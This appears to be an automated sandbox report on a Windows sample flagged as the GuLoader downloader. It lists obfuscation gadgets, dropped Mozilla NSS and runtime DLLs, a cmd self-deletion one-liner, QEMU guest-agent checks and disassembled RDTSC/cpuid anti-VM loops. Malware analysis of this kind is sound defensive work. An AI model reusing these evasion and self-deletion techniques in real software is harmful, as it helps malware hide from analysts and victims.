Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: msvcp140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: ucrtbase.pdbUGP source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909154010.000000001F568000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.17.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.615028324.0000000002300000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00403A43 push eax; ret 0_2_00403A44
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040546D push ebp; retf 0_2_0040546E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00403C03 push edi; iretd 0_2_00403C04
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00404CF9 push ds; iretd 0_2_00404CFD
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_004079F7 push ebx; iretd 0_2_004079F8
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181E33 push edx; ret 0_2_02181E61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180218 push edx; ret 0_2_02180241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184A13 push edx; ret 0_2_02184A41
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02183213 push edx; ret 0_2_02183241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181A13 push edx; ret 0_2_02181A41
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02186214 push edx; ret 0_2_02186241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185A03 push edx; ret 0_2_02185A31
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181205 push edx; ret 0_2_02181231
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182A07 push edx; ret 0_2_02182A31
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184207 push edx; ret 0_2_02184231
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184233 push edx; ret 0_2_02184261
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182A33 push edx; ret 0_2_02182A61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02181233 push edx; ret 0_2_02181261
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185A33 push edx; ret 0_2_02185A61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02183A24 push edx; ret 0_2_02183A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182224 push edx; ret 0_2_02182251
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180A24 push edx; ret 0_2_02180A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02186A24 push edx; ret 0_2_02186A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185225 push edx; ret 0_2_02185251
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180A58 push edx; ret 0_2_02180A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02185253 push edx; ret 0_2_02185281
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02183A54 push edx; ret 0_2_02183A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02182254 push edx; ret 0_2_02182281
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02186A54 push edx; ret 0_2_02186A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02180248 push edx; ret 0_2_02180271
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02184A44 push edx; ret 0_2_02184A71
PE file contains sections with non-standard names
Source: msvcp140.dll.17.dr Static PE information: section name: .didat
Binary contains a suspicious time stamp
Source: api-ms-win-core-console-l1-1-0.dll.17.dr Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Self deletion via cmd delete
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process created: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe' Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: X4lLneI8ZK.exe, 00000000.00000002.615043680.0000000002320000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000002308D60 second address: 0000000002308D60 instructions: 0x00000000 rdtsc 0x00000002 mov eax, BB214E73h 0x00000007 xor eax, 727F15ACh 0x0000000c xor eax, 436B0CE7h 0x00000011 add eax, 75CAA8C9h 0x00000016 cpuid 0x00000018 popad 0x00000019 cmp dh, 0000001Bh 0x0000001c call 00007FCCA4855AAEh 0x00000021 lfence 0x00000024 mov edx, E3CDDACDh 0x00000029 sub edx, 1AD96B88h 0x0000002f add edx, 4D4BD7E9h 0x00000035 xor edx, 69BE473Ah 0x0000003b mov edx, dword ptr [edx] 0x0000003d lfence 0x00000040 test bx, cx 0x00000043 cmp dl, bl 0x00000045 cmp ebx, eax 0x00000047 cmp ah, FFFFFFC1h 0x0000004a cmp ecx, ebx 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 test edx, edx 0x00000052 add edi, edx 0x00000054 test ch, bh 0x00000056 dec dword ptr [ebp+000000F8h] 0x0000005c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000063 jne 00007FCCA4855A86h 0x00000065 test cl, bl 0x00000067 call 00007FCCA4855AF0h 0x0000006c call 00007FCCA4855AD2h 0x00000071 lfence 0x00000074 mov edx, E3CDDACDh 0x00000079 sub edx, 1AD96B88h 0x0000007f add edx, 4D4BD7E9h 0x00000085 xor edx, 69BE473Ah 0x0000008b mov edx, dword ptr [edx] 0x0000008d lfence 0x00000090 test bx, cx 0x00000093 cmp dl, bl 0x00000095 cmp ebx, eax 0x00000097 cmp ah, FFFFFFC1h 0x0000009a cmp ecx, ebx 0x0000009c ret 0x0000009d mov esi, edx 0x0000009f pushad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000002308DC6 second address: 0000000002308DC6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 58EB7642h 0x00000013 xor eax, C275F580h 0x00000018 xor eax, 603D3F8Dh 0x0000001d sub eax, FAA3BC4Eh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FCCA43985BFh 0x0000002e test edx, edx 0x00000030 popad 0x00000031 call 00007FCCA4397FB5h 0x00000036 lfence 0x00000039 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000000568D60 second address: 0000000000568D60 instructions: 0x00000000 rdtsc 0x00000002 mov eax, BB214E73h 0x00000007 xor eax, 727F15ACh 0x0000000c xor eax, 436B0CE7h 0x00000011 add eax, 75CAA8C9h 0x00000016 cpuid 0x00000018 popad 0x00000019 cmp dh, 0000001Bh 0x0000001c call 00007FCCA4855AAEh 0x00000021 lfence 0x00000024 mov edx, E3CDDACDh 0x00000029 sub edx, 1AD96B88h 0x0000002f add edx, 4D4BD7E9h 0x00000035 xor edx, 69BE473Ah 0x0000003b mov edx, dword ptr [edx] 0x0000003d lfence 0x00000040 test bx, cx 0x00000043 cmp dl, bl 0x00000045 cmp ebx, eax 0x00000047 cmp ah, FFFFFFC1h 0x0000004a cmp ecx, ebx 0x0000004c ret 0x0000004d sub edx, esi 0x0000004f ret 0x00000050 test edx, edx 0x00000052 add edi, edx 0x00000054 test ch, bh 0x00000056 dec dword ptr [ebp+000000F8h] 0x0000005c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000063 jne 00007FCCA4855A86h 0x00000065 test cl, bl 0x00000067 call 00007FCCA4855AF0h 0x0000006c call 00007FCCA4855AD2h 0x00000071 lfence 0x00000074 mov edx, E3CDDACDh 0x00000079 sub edx, 1AD96B88h 0x0000007f add edx, 4D4BD7E9h 0x00000085 xor edx, 69BE473Ah 0x0000008b mov edx, dword ptr [edx] 0x0000008d lfence 0x00000090 test bx, cx 0x00000093 cmp dl, bl 0x00000095 cmp ebx, eax 0x00000097 cmp ah, FFFFFFC1h 0x0000009a cmp ecx, ebx 0x0000009c ret 0x0000009d mov esi, edx 0x0000009f pushad 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe RDTSC instruction interceptor: First address: 0000000000568DC6 second address: 0000000000568DC6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 58EB7642h 0x00000013 xor eax, C275F580h 0x00000018 xor eax, 603D3F8Dh 0x0000001d sub eax, FAA3BC4Eh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FCCA43985BFh 0x0000002e test edx, edx 0x00000030 popad 0x00000031 call 00007FCCA4397FB5h 0x00000036 lfence 0x00000039 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe TID: 5716 Thread sleep count: 31 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
